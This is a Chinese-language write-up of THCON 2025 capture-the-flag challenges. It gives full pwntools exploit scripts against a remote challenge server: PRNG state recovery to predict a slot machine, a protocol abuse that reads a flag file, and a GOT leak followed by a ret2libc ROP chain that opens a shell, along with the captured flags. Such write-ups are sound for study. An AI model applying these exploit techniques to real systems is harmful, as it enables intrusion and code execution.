THCON 2025

news/2025/4/22 2:27:38

Crypto

OTPas_ouf

用10个字符异或加密的jpg图片，通过头得到key再恢复原图

Mammoth's Personnal Slot Machine

梅森旋转恢复

from pwn import *
from randcrack import RandCrack
from tqdm import trange
context.log_level = 'error'p = remote('74.234.198.209', 33004)rc = RandCrack()
for i in trange(624):p.sendlineafter(b":\n", b'0')p.recvuntil(b"The number was ")v = int(p.recvuntil(b'. ', drop=True))rc.submit(v)context.log_level = 'debug'
v = rc.predict_getrandbits(32)
p.sendlineafter(b":\n", str(v).encode())
print(p.recvline())
print(p.recvline())p.interactive()#THC{1ts_H4rD_T0_H4v3_Tru3_RNG}

PWN

XSStorage 1/3 2/3

前两关其实没有难，就是读代码找到打包输入的格式。后边走到相应的路由就能拿到flag

第3步3/3是0解，没找到溢出或者漏洞。

from pwn import *
context(arch='amd64', log_level='debug')#p = process('./xsstorage')
#gdb.attach(p, "b*0x5555555557c8\nc")
p = remote('74.234.198.209', 33553)p.send(b'\0\0')
name = b'butch3r'p.send(b'\x01'+bytes([len(name)])+name)
p.send(b'a'*16)
#THC{4u7h_by_0ne-b2294d90}#readdir
p.send(b'\0\x04')
#2 readfile
p.send(b'\0\x02'+p16(0x50)+ p8(18)+b'flag-80dd993f.txt\0')
#THC{l34ky_l34ky_ch3cksum-89723c2a}p.interactive()

BlackMarket 1/2 2/2

在执行buy_exploit(v3)时批针可以前溢出，向前-21处是got表，先泄露地址再通过栈溢出得到shell.

int __cdecl main(int argc, const char **argv, const char **envp)
{int v3; // eaxbanner();printf("Hello person, please enter a temporary username used for your connection: ");fgets(logged_user, 256, stdin);printf("Now, enter your email so we can contact you later: ");fgets(byte_4041C0, 256, stdin);byte_4042C8 = 1;dov3 = menu();while ( (unsigned __int8)buy_exploit(v3) != 1 );return 0;
}

from pwn import *
context(arch='amd64', log_level='debug')libc = ELF('./libc.so.6')#p = process('./black-market')
#gdb.attach(p, "b*0x401542\nc")
p = remote('74.234.198.209', 32844)p.sendlineafter(b"Hello person, please enter a temporary username used for your connection: ", b'A'*0x10+flat(0x404020,0x404028))
p.sendlineafter(b"Now, enter your email so we can contact you later: ", b'A')p.sendlineafter(b'> ', b'-21')
p.recvuntil(b"Exploit \"")
libc.address = u64(p.recv(6)+b'\0\0') - libc.sym['puts']
print(f"{libc.address = :x}")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
pay = b'\0'*0xd8 + flat(pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\0')) ,libc.sym['system'])
p.sendlineafter(b"Let us know your PGP public key to send you the exploit securely:", pay)
p.interactive()#THC{unb0und3d_3xpl0175-186f1dac}
#cd /;read_flag  #THC{r3t2l1bc_101-a03670f2}